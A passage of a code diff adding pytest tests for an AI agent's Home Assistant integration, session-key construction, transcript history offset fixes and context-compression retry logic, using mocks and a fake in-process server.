+        with patch("gateway.platforms.homeassistant.aiohttp") as mock_aiohttp:
+            mock_aiohttp.ClientSession = MagicMock(return_value=mock_session)
+            mock_aiohttp.ClientTimeout = lambda total: total
+
+            result = await adapter.send("ha_events", "Test notification")
+
+        assert result.success is True
+        # Verify the REST API was called with correct payload
+        call_args = mock_session.post.call_args
+        assert "/api/services/persistent_notification/create" in call_args[0][0]
+        assert call_args[1]["json"]["title"] == "Hermes Agent"
+        assert call_args[1]["json"]["message"] == "Test notification"
+        assert "Bearer tok" in call_args[1]["headers"]["Authorization"]
+
+    @pytest.mark.asyncio
+    async def test_send_http_error(self):
+        adapter = _make_adapter()
+        mock_session = self._mock_aiohttp_session(401, "Unauthorized")
+
+        with patch("gateway.platforms.homeassistant.aiohttp") as mock_aiohttp:
+            mock_aiohttp.ClientSession = MagicMock(return_value=mock_session)
+            mock_aiohttp.ClientTimeout = lambda total: total
+
+            result = await adapter.send("ha_events", "Test")
+
+        assert result.success is False
+        assert "401" in result.error
+
+    @pytest.mark.asyncio
+    async def test_send_truncates_long_message(self):
+        adapter = _make_adapter()
+        mock_session = self._mock_aiohttp_session(200)
+        long_message = "x" * 10000
+
+        with patch("gateway.platforms.homeassistant.aiohttp") as mock_aiohttp:
+            mock_aiohttp.ClientSession = MagicMock(return_value=mock_session)
+            mock_aiohttp.ClientTimeout = lambda total: total
+
+            await adapter.send("ha_events", long_message)
+
+        sent_message = mock_session.post.call_args[1]["json"]["message"]
+        assert len(sent_message) == 4096
+
+    @pytest.mark.asyncio
+    async def test_send_does_not_use_websocket(self):
+        """send() must use REST API, not the WS connection (race condition fix)."""
+        adapter = _make_adapter()
+        adapter._ws = AsyncMock()  # Simulate an active WS
+        mock_session = self._mock_aiohttp_session(200)
+
+        with patch("gateway.platforms.homeassistant.aiohttp") as mock_aiohttp:
+            mock_aiohttp.ClientSession = MagicMock(return_value=mock_session)
+            mock_aiohttp.ClientTimeout = lambda total: total
+
+            await adapter.send("ha_events", "Test")
+
+        # WS should NOT have been used for sending
+        adapter._ws.send_json.assert_not_called()
+        adapter._ws.receive_json.assert_not_called()
+
+
+# ---------------------------------------------------------------------------
+# Toolset integration
+# ---------------------------------------------------------------------------
+
+
+class TestToolsetIntegration:
+    def test_homeassistant_toolset_resolves(self):
+        from toolsets import resolve_toolset
+
+        tools = resolve_toolset("homeassistant")
+        assert set(tools) == {"ha_list_entities", "ha_get_state", "ha_call_service", "ha_list_services"}
+
+    def test_gateway_toolset_includes_ha_tools(self):
+        from toolsets import resolve_toolset
+
+        gateway_tools = resolve_toolset("hermes-gateway")
+        for tool in ("ha_list_entities", "ha_get_state", "ha_call_service", "ha_list_services"):
+            assert tool in gateway_tools
+
+    def test_hermes_core_tools_includes_ha(self):
+        from toolsets import _HERMES_CORE_TOOLS
+
+        for tool in ("ha_list_entities", "ha_get_state", "ha_call_service", "ha_list_services"):
+            assert tool in _HERMES_CORE_TOOLS
+
+
+# ---------------------------------------------------------------------------
+# WebSocket URL construction
+# ---------------------------------------------------------------------------
+
+
+class TestWsUrlConstruction:
+    def test_http_to_ws(self):
+        config = PlatformConfig(enabled=True, token="t", extra={"url": "http://ha:8123"})
+        adapter = HomeAssistantAdapter(config)
+        ws_url = adapter._hass_url.replace("http://", "ws://").replace("https://", "wss://")
+        assert ws_url == "ws://ha:8123"
+
+    def test_https_to_wss(self):
+        config = PlatformConfig(enabled=True, token="t", extra={"url": "https://ha.example.com"})
+        adapter = HomeAssistantAdapter(config)
+        ws_url = adapter._hass_url.replace("http://", "ws://").replace("https://", "wss://")
+        assert ws_url == "wss://ha.example.com"
--- a/tests/gateway/test_session.py
+++ b/tests/gateway/test_session.py
@@ -10,6 +10,7 @@ from gateway.session import (
    SessionStore,
    build_session_context,
    build_session_context_prompt,
+    build_session_key,
 )


@@ -314,6 +315,60 @@ class TestSessionStoreRewriteTranscript:
        assert reloaded == []


+class TestWhatsAppDMSessionKeyConsistency:
+    """Regression: all session-key construction must go through build_session_key
+    so WhatsApp DMs include chat_id while other DMs do not."""
+
+    @pytest.fixture()
+    def store(self, tmp_path):
+        config = GatewayConfig()
+        with patch("gateway.session.SessionStore._ensure_loaded"):
+            s = SessionStore(sessions_dir=tmp_path, config=config)
+        s._db = None
+        s._loaded = True
+        return s
+
+    def test_whatsapp_dm_includes_chat_id(self):
+        source = SessionSource(
+            platform=Platform.WHATSAPP,
+            chat_id="15551234567@s.whatsapp.net",
+            chat_type="dm",
+            user_name="Phone User",
+        )
+        key = build_session_key(source)
+        assert key == "agent:main:whatsapp:dm:15551234567@s.whatsapp.net"
+
+    def test_store_delegates_to_build_session_key(self, store):
+        """SessionStore._generate_session_key must produce the same result."""
+        source = SessionSource(
+            platform=Platform.WHATSAPP,
+            chat_id="15551234567@s.whatsapp.net",
+            chat_type="dm",
+            user_name="Phone User",
+        )
+        assert store._generate_session_key(source) == build_session_key(source)
+
+    def test_telegram_dm_omits_chat_id(self):
+        """Non-WhatsApp DMs should still omit chat_id (single owner DM)."""
+        source = SessionSource(
+            platform=Platform.TELEGRAM,
+            chat_id="99",
+            chat_type="dm",
+        )
+        key = build_session_key(source)
+        assert key == "agent:main:telegram:dm"
+
+    def test_discord_group_includes_chat_id(self):
+        """Group/channel keys include chat_type and chat_id."""
+        source = SessionSource(
+            platform=Platform.DISCORD,
+            chat_id="guild-123",
+            chat_type="group",
+        )
+        key = build_session_key(source)
+        assert key == "agent:main:discord:group:guild-123"
+
+
 class TestSessionStoreEntriesAttribute:
    """Regression: /reset must access _entries, not _sessions."""

@@ -324,3 +379,53 @@ class TestSessionStoreEntriesAttribute:
        store._loaded = True
        assert hasattr(store, "_entries")
        assert not hasattr(store, "_sessions")
+
+
+class TestHasAnySessions:
+    """Tests for has_any_sessions() fix (issue #351)."""
+
+    @pytest.fixture
+    def store_with_mock_db(self, tmp_path):
+        """SessionStore with a mocked database."""
+        config = GatewayConfig()
+        with patch("gateway.session.SessionStore._ensure_loaded"):
+            s = SessionStore(sessions_dir=tmp_path, config=config)
+        s._loaded = True
+        s._entries = {}
+        s._db = MagicMock()
+        return s
+
+    def test_uses_database_count_when_available(self, store_with_mock_db):
+        """has_any_sessions should use database session_count, not len(_entries)."""
+        store = store_with_mock_db
+        # Simulate single-platform user with only 1 entry in memory
+        store._entries = {"telegram:12345": MagicMock()}
+        # But database has 3 sessions (current + 2 previous resets)
+        store._db.session_count.return_value = 3
+
+        assert store.has_any_sessions() is True
+        store._db.session_count.assert_called_once()
+
+    def test_first_session_ever_returns_false(self, store_with_mock_db):
+        """First session ever should return False (only current session in DB)."""
+        store = store_with_mock_db
+        store._entries = {"telegram:12345": MagicMock()}
+        # Database has exactly 1 session (the current one just created)
+        store._db.session_count.return_value = 1
+
+        assert store.has_any_sessions() is False
+
+    def test_fallback_without_database(self, tmp_path):
+        """Should fall back to len(_entries) when DB is not available."""
+        config = GatewayConfig()
+        with patch("gateway.session.SessionStore._ensure_loaded"):
+            store = SessionStore(sessions_dir=tmp_path, config=config)
+        store._loaded = True
+        store._db = None
+        store._entries = {"key1": MagicMock(), "key2": MagicMock()}
+
+        # > 1 entries means has sessions
+        assert store.has_any_sessions() is True
+
+        store._entries = {"key1": MagicMock()}
+        assert store.has_any_sessions() is False
--- a/tests/gateway/test_transcript_offset.py
+++ b/tests/gateway/test_transcript_offset.py
@@ -0,0 +1,267 @@
+"""Tests for transcript history offset fix.
+
+Regression tests for a bug where the gateway transcript lost 1 message
+per turn from turn 2 onwards.  The raw transcript history includes
+``session_meta`` entries that are filtered out before being passed to
+the agent.  The agent returns messages built from this filtered history
+plus new messages from the current turn.
+
+The old code used ``len(history)`` (raw count, includes session_meta)
+to slice ``agent_messages``, which caused the slice to skip valid new
+messages.  The fix adds ``history_offset`` (the filtered history length)
+to ``_run_agent``'s return dict and uses it for the slice.
+"""
+
+import pytest
+
+
+# ---------------------------------------------------------------------------
+# Helpers - replicate the filtering logic from _run_agent
+# ---------------------------------------------------------------------------
+
+def _filter_history(history: list) -> list:
+    """Replicate the agent_history filtering from GatewayRunner._run_agent.
+
+    Strips session_meta and system messages, exactly as the real code does.
+    """
+    agent_history = []
+    for msg in history:
+        role = msg.get("role")
+        if not role:
+            continue
+        if role in ("session_meta",):
+            continue
+        if role == "system":
+            continue
+
+        has_tool_calls = "tool_calls" in msg
+        has_tool_call_id = "tool_call_id" in msg
+        is_tool_message = role == "tool"
+
+        if has_tool_calls or has_tool_call_id or is_tool_message:
+            clean_msg = {k: v for k, v in msg.items() if k != "timestamp"}
+            agent_history.append(clean_msg)
+        else:
+            content = msg.get("content")
+            if content:
+                agent_history.append({"role": role, "content": content})
+    return agent_history
+
+
+# ---------------------------------------------------------------------------
+# Tests
+# ---------------------------------------------------------------------------
+
+class TestTranscriptHistoryOffset:
+    """Verify the transcript extraction uses the filtered history length."""
+
+    def test_session_meta_causes_offset_mismatch(self):
+        """Turn 2: session_meta makes len(history) > len(agent_history).
+
+        - history (raw): 1 session_meta + 2 conversation = 3 entries
+        - agent_history (filtered): 2 entries
+        - Agent returns 2 old + 2 new = 4 messages
+        - OLD: agent_messages[3:] = 1 message (lost the user message)
+        - FIX: agent_messages[2:] = 2 messages (correct)
+        """
+        history = [
+            {"role": "session_meta", "tools": [], "model": "gpt-4",
+             "platform": "telegram", "timestamp": "t0"},
+            {"role": "user", "content": "Hello", "timestamp": "t1"},
+            {"role": "assistant", "content": "Hi there!", "timestamp": "t1"},
+        ]
+
+        agent_history = _filter_history(history)
+        assert len(agent_history) == 2  # session_meta stripped
+
+        # Agent returns: filtered history (2) + new turn (2)
+        agent_messages = [
+            {"role": "user", "content": "Hello"},
+            {"role": "assistant", "content": "Hi there!"},
+            {"role": "user", "content": "What is Python?"},
+            {"role": "assistant", "content": "A programming language."},
+        ]
+
+        # OLD behavior: len(history) = 3, skips too many
+        old_offset = len(history)
+        old_new = (agent_messages[old_offset:]
+                   if len(agent_messages) > old_offset
+                   else agent_messages)
+        assert len(old_new) == 1  # BUG: lost the user message
+
+        # FIXED behavior: history_offset = 2
+        history_offset = len(agent_history)
+        fixed_new = (agent_messages[history_offset:]
+                     if len(agent_messages) > history_offset
+                     else [])
+        assert len(fixed_new) == 2
+        assert fixed_new[0]["content"] == "What is Python?"
+        assert fixed_new[1]["content"] == "A programming language."
+
+    def test_no_session_meta_same_result(self):
+        """First turn has no session_meta, so both approaches agree."""
+        history = []
+        agent_history = _filter_history(history)
+        assert len(agent_history) == 0
+
+        agent_messages = [
+            {"role": "user", "content": "Hello"},
+            {"role": "assistant", "content": "Hi!"},
+        ]
+
+        old_new = (agent_messages[len(history):]
+                   if len(agent_messages) > len(history)
+                   else agent_messages)
+        fixed_new = (agent_messages[len(agent_history):]
+                     if len(agent_messages) > len(agent_history)
+                     else [])
+
+        assert old_new == fixed_new
+        assert len(fixed_new) == 2
+
+    def test_multiple_session_meta_larger_drift(self):
+        """Two session_meta entries double the offset error.
+
+        This can happen when the session spans tool definition changes
+        or model switches that each write a new session_meta record.
+        """
+        history = [
+            {"role": "session_meta", "tools": [], "timestamp": "t0"},
+            {"role": "user", "content": "msg1", "timestamp": "t1"},
+            {"role": "assistant", "content": "reply1", "timestamp": "t1"},
+            {"role": "session_meta", "tools": ["new_tool"], "timestamp": "t2"},
+            {"role": "user", "content": "msg2", "timestamp": "t3"},
+            {"role": "assistant", "content": "reply2", "timestamp": "t3"},
+        ]
+
+        agent_history = _filter_history(history)
+        assert len(agent_history) == 4
+        assert len(history) == 6  # 2 extra session_meta entries
+
+        # Agent returns 4 old + 2 new = 6 total
+        agent_messages = [
+            {"role": "user", "content": "msg1"},
+            {"role": "assistant", "content": "reply1"},
+            {"role": "user", "content": "msg2"},
+            {"role": "assistant", "content": "reply2"},
+            {"role": "user", "content": "msg3"},
+            {"role": "assistant", "content": "reply3"},
+        ]
+
+        # OLD: len(history) == len(agent_messages) == 6 -> else branch
+        old_offset = len(history)
+        old_new = (agent_messages[old_offset:]
+                   if len(agent_messages) > old_offset
+                   else agent_messages)
+        # BUG: treats ALL messages as new (duplicates entire history)
+        assert old_new == agent_messages
+
+        # FIXED: history_offset = 4
+        fixed_new = (agent_messages[len(agent_history):]
+                     if len(agent_messages) > len(agent_history)
+                     else [])
+        assert len(fixed_new) == 2
+        assert fixed_new[0]["content"] == "msg3"
+        assert fixed_new[1]["content"] == "reply3"
+
+    def test_system_messages_also_filtered(self):
+        """system messages in history are also stripped from agent_history."""
+        history = [
+            {"role": "session_meta", "tools": [], "timestamp": "t0"},
+            {"role": "system", "content": "You are a helpful assistant."},
+            {"role": "user", "content": "Hi", "timestamp": "t1"},
+            {"role": "assistant", "content": "Hello!", "timestamp": "t1"},
+        ]
+
+        agent_history = _filter_history(history)
+        assert len(agent_history) == 2  # only user + assistant
+
+        agent_messages = [
+            {"role": "user", "content": "Hi"},
+            {"role": "assistant", "content": "Hello!"},
+            {"role": "user", "content": "New question"},
+            {"role": "assistant", "content": "New answer"},
+        ]
+
+        # OLD: len(history) = 4, skips everything
+        old_offset = len(history)
+        old_new = (agent_messages[old_offset:]
+                   if len(agent_messages) > old_offset
+                   else agent_messages)
+        assert old_new == agent_messages  # BUG: all treated as new
+
+        # FIXED
+        fixed_new = (agent_messages[len(agent_history):]
+                     if len(agent_messages) > len(agent_history)
+                     else [])
+        assert len(fixed_new) == 2
+        assert fixed_new[0]["content"] == "New question"
+
+    def test_else_branch_returns_empty_list(self):
+        """When agent has fewer messages than offset, return [] not all.
+
+        The old code had ``else agent_messages`` which would treat the
+        entire message list as new when the agent compressed or dropped
+        messages.  The fix changes this to ``else []``, falling through
+        to the simple user/assistant fallback path.
+        """
+        history = [
+            {"role": "session_meta", "tools": [], "timestamp": "t0"},
+            {"role": "user", "content": "Hello", "timestamp": "t1"},
+            {"role": "assistant", "content": "Hi!", "timestamp": "t1"},
+        ]
+
+        # Agent compressed and returned fewer messages than history
+        agent_messages = [
+            {"role": "user", "content": "Hello"},
+            {"role": "assistant", "content": "Hi!"},
+        ]
+
+        history_offset = len(_filter_history(history))  # 2
+        new_messages = (agent_messages[history_offset:]
+                        if len(agent_messages) > history_offset
+                        else [])
+        # 2 == 2, so no new messages - falls to fallback
+        assert new_messages == []
+
+    def test_tool_call_messages_preserved_in_filter(self):
+        """Tool call messages pass through the filter, keeping offset correct."""
+        history = [
+            {"role": "session_meta", "tools": [], "timestamp": "t0"},
+            {"role": "user", "content": "Search for cats", "timestamp": "t1"},
+            {"role": "assistant", "content": None, "timestamp": "t1",
+             "tool_calls": [{"id": "tc1", "function": {"name": "web_search"}}]},
+            {"role": "tool", "tool_call_id": "tc1",
+             "content": "Results about cats", "timestamp": "t1"},
+            {"role": "assistant", "content": "Here are results.",
+             "timestamp": "t1"},
+        ]
+
+        agent_history = _filter_history(history)
+        # session_meta filtered, but tool_calls/tool messages kept
+        assert len(agent_history) == 4
+        assert len(history) == 5  # 1 session_meta extra
+
+        agent_messages = [
+            {"role": "user", "content": "Search for cats"},
+            {"role": "assistant", "content": None,
+             "tool_calls": [{"id": "tc1", "function": {"name": "web_search"}}]},
+            {"role": "tool", "tool_call_id": "tc1", "content": "Results about cats"},
+            {"role": "assistant", "content": "Here are results."},
+            {"role": "user", "content": "Now search for dogs"},
+            {"role": "assistant", "content": "Dog results here."},
+        ]
+
+        # OLD: len(history) = 5, agent_messages[5:] = 1 message (lost user msg)
+        old_new = (agent_messages[len(history):]
+                   if len(agent_messages) > len(history)
+                   else agent_messages)
+        assert len(old_new) == 1  # BUG
+
+        # FIXED
+        fixed_new = (agent_messages[len(agent_history):]
+                     if len(agent_messages) > len(agent_history)
+                     else [])
+        assert len(fixed_new) == 2
+        assert fixed_new[0]["content"] == "Now search for dogs"
+        assert fixed_new[1]["content"] == "Dog results here."
--- a/tests/integration/test_ha_integration.py
+++ b/tests/integration/test_ha_integration.py
@@ -0,0 +1,341 @@
+"""Integration tests for Home Assistant (tool + gateway).
+
+Spins up a real in-process fake HA server (HTTP + WebSocket) and exercises
+the full adapter and tool handler paths over real TCP connections.
+No mocks -- only real async I/O against a fake server.
+
+Run with:  uv run pytest tests/integration/test_ha_integration.py -v
+"""
+
+import asyncio
+
+import pytest
+
+pytestmark = pytest.mark.integration
+
+from unittest.mock import AsyncMock
+
+from gateway.config import Platform, PlatformConfig
+from gateway.platforms.homeassistant import HomeAssistantAdapter
+from tests.fakes.fake_ha_server import FakeHAServer, ENTITY_STATES
+from tools.homeassistant_tool import (
+    _async_call_service,
+    _async_get_state,
+    _async_list_entities,
+)
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+
+def _adapter_for(server: FakeHAServer, **extra) -> HomeAssistantAdapter:
+    """Create an adapter pointed at the fake server."""
+    config = PlatformConfig(
+        enabled=True,
+        token=server.token,
+        extra={"url": server.url, **extra},
+    )
+    return HomeAssistantAdapter(config)
+
+
+# ---------------------------------------------------------------------------
+# 1. Gateway -- WebSocket lifecycle
+# ---------------------------------------------------------------------------
+
+
+class TestGatewayWebSocket:
+    @pytest.mark.asyncio
+    async def test_connect_auth_subscribe(self):
+        """Full WS handshake succeeds: auth_required -> auth -> auth_ok -> subscribe -> ACK."""
+        async with FakeHAServer() as server:
+            adapter = _adapter_for(server)
+            connected = await adapter.connect()
+            assert connected is True
+            assert adapter._running is True
+            assert adapter._ws is not None
+            assert not adapter._ws.closed
+            await adapter.disconnect()
+
+    @pytest.mark.asyncio
+    async def test_connect_auth_rejected(self):
+        """connect() returns False when the server rejects auth."""
+        async with FakeHAServer() as server:
+            server.reject_auth = True
+            adapter = _adapter_for(server)
+            connected = await adapter.connect()
+            assert connected is False
+
+    @pytest.mark.asyncio
+    async def test_event_received_and_forwarded(self):
+        """Server pushes event -> adapter calls handle_message with correct MessageEvent."""
+        async with FakeHAServer() as server:
+            adapter = _adapter_for(server)
+            adapter.handle_message = AsyncMock()
+
+            await adapter.connect()
+
+            # Push a state_changed event
+            await server.push_event({
+                "data": {
+                    "entity_id": "light.bedroom",
+                    "old_state": {"state": "off", "attributes": {}},
+                    "new_state": {
+                        "state": "on",
+                        "attributes": {"friendly_name": "Bedroom Light"},
+                    },
+                }
+            })
+
+            # Wait for the adapter to process it
+            for _ in range(50):
+                if adapter.handle_message.call_count > 0:
+                    break
+                await asyncio.sleep(0.05)
+
+            assert adapter.handle_message.call_count == 1
+            msg_event = adapter.handle_message.call_args[0][0]
+            assert "Bedroom Light" in msg_event.text
+            assert "turned on" in msg_event.text
+            assert msg_event.source.platform == Platform.HOMEASSISTANT
+
+            await adapter.disconnect()
+
+    @pytest.mark.asyncio
+    async def test_event_filtering_ignores_unwatched(self):
+        """Events outside watch_domains are silently dropped."""
+        async with FakeHAServer() as server:
+            adapter = _adapter_for(server, watch_domains=["climate"])
+            adapter.handle_message = AsyncMock()
+
+            await adapter.connect()
+
+            # Push a light event (not in watch_domains)
+            await server.push_event({
+                "data": {
+                    "entity_id": "light.bedroom",
+                    "old_state": {"state": "off", "attributes": {}},
+                    "new_state": {
+                        "state": "on",
+                        "attributes": {"friendly_name": "Bedroom Light"},
+                    },
+                }
+            })
+
+            await asyncio.sleep(0.5)
+            assert adapter.handle_message.call_count == 0
+
+            await adapter.disconnect()
+
+    @pytest.mark.asyncio
+    async def test_disconnect_closes_cleanly(self):
+        """disconnect() cancels listener and closes WebSocket."""
+        async with FakeHAServer() as server:
+            adapter = _adapter_for(server)
+            await adapter.connect()
+            ws_ref = adapter._ws
+
+            await adapter.disconnect()
+
+            assert adapter._running is False
+            assert adapter._listen_task is None
+            assert adapter._ws is None
+            # The original WS reference should be closed
+            assert ws_ref.closed
+
+
+# ---------------------------------------------------------------------------
+# 2. REST tool handlers (real HTTP against fake server)
+# ---------------------------------------------------------------------------
+
+
+class TestToolRest:
+    """Call the async tool functions directly against the fake server.
+
+    Note: we call ``_async_*`` instead of the sync ``_handle_*`` wrappers
+    because the sync wrappers use ``_run_async`` which blocks the event
+    loop, deadlocking with the in-process fake server.  The async functions
+    are the real logic; the sync wrappers are trivial bridge code already
+    covered by unit tests.
+    """
+
+    @pytest.mark.asyncio
+    async def test_list_entities_returns_all(self, monkeypatch):
+        """_async_list_entities returns all entities from the fake server."""
+        async with FakeHAServer() as server:
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_URL", server.url,
+            )
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_TOKEN", server.token,
+            )
+
+            result = await _async_list_entities()
+
+            assert result["count"] == len(ENTITY_STATES)
+            ids = {e["entity_id"] for e in result["entities"]}
+            assert "light.bedroom" in ids
+            assert "climate.thermostat" in ids
+
+    @pytest.mark.asyncio
+    async def test_list_entities_domain_filter(self, monkeypatch):
+        """Domain filter is applied after fetching from server."""
+        async with FakeHAServer() as server:
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_URL", server.url,
+            )
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_TOKEN", server.token,
+            )
+
+            result = await _async_list_entities(domain="light")
+
+            assert result["count"] == 2
+            for e in result["entities"]:
+                assert e["entity_id"].startswith("light.")
+
+    @pytest.mark.asyncio
+    async def test_get_state_single_entity(self, monkeypatch):
+        """_async_get_state returns full entity details."""
+        async with FakeHAServer() as server:
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_URL", server.url,
+            )
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_TOKEN", server.token,
+            )
+
+            result = await _async_get_state("light.bedroom")
+
+            assert result["entity_id"] == "light.bedroom"
+            assert result["state"] == "on"
+            assert result["attributes"]["brightness"] == 200
+            assert result["last_changed"] is not None
+
+    @pytest.mark.asyncio
+    async def test_get_state_not_found(self, monkeypatch):
+        """Non-existent entity raises an aiohttp error (404)."""
+        import aiohttp as _aiohttp
+
+        async with FakeHAServer() as server:
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_URL", server.url,
+            )
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_TOKEN", server.token,
+            )
+
+            with pytest.raises(_aiohttp.ClientResponseError) as exc_info:
+                await _async_get_state("light.nonexistent")
+            assert exc_info.value.status == 404
+
+    @pytest.mark.asyncio
+    async def test_call_service_turn_on(self, monkeypatch):
+        """_async_call_service sends correct payload and server records it."""
+        async with FakeHAServer() as server:
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_URL", server.url,
+            )
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_TOKEN", server.token,
+            )
+
+            result = await _async_call_service(
+                domain="light",
+                service="turn_on",
+                entity_id="light.bedroom",
+                data={"brightness": 255},
+            )
+
+            assert result["success"] is True
+            assert result["service"] == "light.turn_on"
+            assert len(result["affected_entities"]) == 1
+            assert result["affected_entities"][0]["state"] == "on"
+
+            # Verify fake server recorded the call
+            assert len(server.received_service_calls) == 1
+            call = server.received_service_calls[0]
+            assert call["domain"] == "light"
+            assert call["service"] == "turn_on"
+            assert call["data"]["entity_id"] == "light.bedroom"
+            assert call["data"]["brightness"] == 255
+
+
+# ---------------------------------------------------------------------------
+# 3. send() -- REST notification
+# ---------------------------------------------------------------------------
+
+
+class TestSendNotification:
+    @pytest.mark.asyncio
+    async def test_send_notification_delivered(self):
+        """Adapter send() delivers notification to fake server REST endpoint."""
+        async with FakeHAServer() as server:
+            adapter = _adapter_for(server)
+
+            result = await adapter.send("ha_events", "Test notification from agent")
+
+            assert result.success is True
+            assert len(server.received_notifications) == 1
+            notif = server.received_notifications[0]
+            assert notif["title"] == "Hermes Agent"
+            assert notif["message"] == "Test notification from agent"
+
+    @pytest.mark.asyncio
+    async def test_send_auth_failure(self):
+        """send() returns failure when token is wrong."""
+        async with FakeHAServer() as server:
+            config = PlatformConfig(
+                enabled=True,
+                token="wrong-token",
+                extra={"url": server.url},
+            )
+            adapter = HomeAssistantAdapter(config)
+
+            result = await adapter.send("ha_events", "Should fail")
+
+            assert result.success is False
+            assert "401" in result.error
+
+
+# ---------------------------------------------------------------------------
+# 4. Auth and error cases
+# ---------------------------------------------------------------------------
+
+
+class TestAuthAndErrors:
+    @pytest.mark.asyncio
+    async def test_rest_unauthorized(self, monkeypatch):
+        """Async function raises on 401 when token is wrong."""
+        import aiohttp as _aiohttp
+
+        async with FakeHAServer() as server:
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_URL", server.url,
+            )
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_TOKEN", "bad-token",
+            )
+
+            with pytest.raises(_aiohttp.ClientResponseError) as exc_info:
+                await _async_list_entities()
+            assert exc_info.value.status == 401
+
+    @pytest.mark.asyncio
+    async def test_rest_server_error(self, monkeypatch):
+        """Async function raises on 500 response."""
+        import aiohttp as _aiohttp
+
+        async with FakeHAServer() as server:
+            server.force_500 = True
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_URL", server.url,
+            )
+            monkeypatch.setattr(
+                "tools.homeassistant_tool._HASS_TOKEN", server.token,
+            )
+
+            with pytest.raises(_aiohttp.ClientResponseError) as exc_info:
+                await _async_list_entities()
+            assert exc_info.value.status == 500
--- a/tests/test_413_compression.py
+++ b/tests/test_413_compression.py
@@ -1,7 +1,9 @@
-"""Tests for 413 payload-too-large → compression retry logic in AIAgent.
+"""Tests for payload/context-length → compression retry logic in AIAgent.

-Verifies that HTTP 413 errors trigger history compression and retry,
-rather than being treated as non-retryable generic 4xx errors.
+Verifies that:
+- HTTP 413 errors trigger history compression and retry
+- HTTP 400 context-length errors trigger compression (not generic 4xx abort)
+- Preflight compression proactively compresses oversized sessions before API calls
 """

 import uuid
@@ -164,6 +166,74 @@ class TestHTTP413Compression:
        mock_compress.assert_called_once()
        assert result["completed"] is True

+    def test_400_context_length_triggers_compression(self, agent):
+        """A 400 with 'maximum context length' should trigger compression, not abort as generic 4xx.
+
+        OpenRouter returns HTTP 400 (not 413) for context-length errors. Before
+        the fix, this was caught by the generic 4xx handler which aborted
+        immediately — now it correctly triggers compression+retry.
+        """
+        err_400 = Exception(
+            "Error code: 400 - {'error': {'message': "
+            "\"This endpoint's maximum context length is 204800 tokens. "
+            "However, you requested about 270460 tokens.\", 'code': 400}}"
+        )
+        err_400.status_code = 400
+        ok_resp = _mock_response(content="Recovered after compression", finish_reason="stop")
+        agent.client.chat.completions.create.side_effect = [err_400, ok_resp]
+
+        prefill = [
+            {"role": "user", "content": "previous question"},
+            {"role": "assistant", "content": "previous answer"},
+        ]
+
+        with (
+            patch.object(agent, "_compress_context") as mock_compress,
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+        ):
+            mock_compress.return_value = (
+                [{"role": "user", "content": "hello"}],
+                "compressed prompt",
+            )
+            result = agent.run_conversation("hello", conversation_history=prefill)
+
+        mock_compress.assert_called_once()
+        # Must NOT have "failed": True (which would mean the generic 4xx handler caught it)
+        assert result.get("failed") is not True
+        assert result["completed"] is True
+        assert result["final_response"] == "Recovered after compression"
+
+    def test_400_reduce_length_triggers_compression(self, agent):
+        """A 400 with 'reduce the length' should trigger compression."""
+        err_400 = Exception(
+            "Error code: 400 - Please reduce the length of the messages"
+        )
+        err_400.status_code = 400
+        ok_resp = _mock_response(content="OK", finish_reason="stop")
+        agent.client.chat.completions.create.side_effect = [err_400, ok_resp]
+
+        prefill = [
+            {"role": "user", "content": "previous question"},
+            {"role": "assistant", "content": "previous answer"},
+        ]
+
+        with (
+            patch.object(agent, "_compress_context") as mock_compress,
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+        ):
+            mock_compress.return_value = (
+                [{"role": "user", "content": "hello"}],
+                "compressed",
+            )
+            result = agent.run_conversation("hello", conversation_history=prefill)
+
+        mock_compress.assert_called_once()
+        assert result["completed"] is True
+
    def test_413_cannot_compress_further(self, agent):
        """When compression can't reduce messages, return partial result."""
        err_413 = _make_413_error()
@@ -185,3 +255,95 @@ class TestHTTP413Compression:
        assert result["completed"] is False
        assert result.get("partial") is True
        assert "413" in result["error"]
+
+
+class TestPreflightCompression:
+    """Preflight compression should compress history before the first API call."""
+
+    def test_preflight_compresses_oversized_history(self, agent):
+        """When loaded history exceeds the model's context threshold, compress before API call."""
+        agent.compression_enabled = True
+        # Set a very small context so the history is "oversized"
+        agent.context_compressor.context_length = 100
+        agent.context_compressor.threshold_tokens = 85  # 85% of 100
+
+        # Build a history that will be large enough to trigger preflight
+        # (each message ~20 chars = ~5 tokens, 20 messages = ~100 tokens > 85 threshold)
+        big_history = []
+        for i in range(20):
+            big_history.append({"role": "user", "content": f"Message number {i} with some extra text padding"})
+            big_history.append({"role": "assistant", "content": f"Response number {i} with extra padding here"})
+
+        ok_resp = _mock_response(content="After preflight", finish_reason="stop")
+        agent.client.chat.completions.create.side_effect = [ok_resp]
+
+        with (
+            patch.object(agent, "_compress_context") as mock_compress,
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+        ):
+            # Simulate compression reducing messages
+            mock_compress.return_value = (
+                [
+                    {"role": "user", "content": "[CONTEXT SUMMARY]: Previous conversation"},
+                    {"role": "user", "content": "hello"},
+                ],
+                "new system prompt",
+            )
+            result = agent.run_conversation("hello", conversation_history=big_history)
+
+        # Preflight compression should have been called BEFORE the API call
+        mock_compress.assert_called_once()
+        assert result["completed"] is True
+        assert result["final_response"] == "After preflight"
+
+    def test_no_preflight_when_under_threshold(self, agent):
+        """When history fits within context, no preflight compression needed."""
+        agent.compression_enabled = True
+        # Large context — history easily fits
+        agent.context_compressor.context_length = 1000000
+        agent.context_compressor.threshold_tokens = 850000
+
+        small_history = [
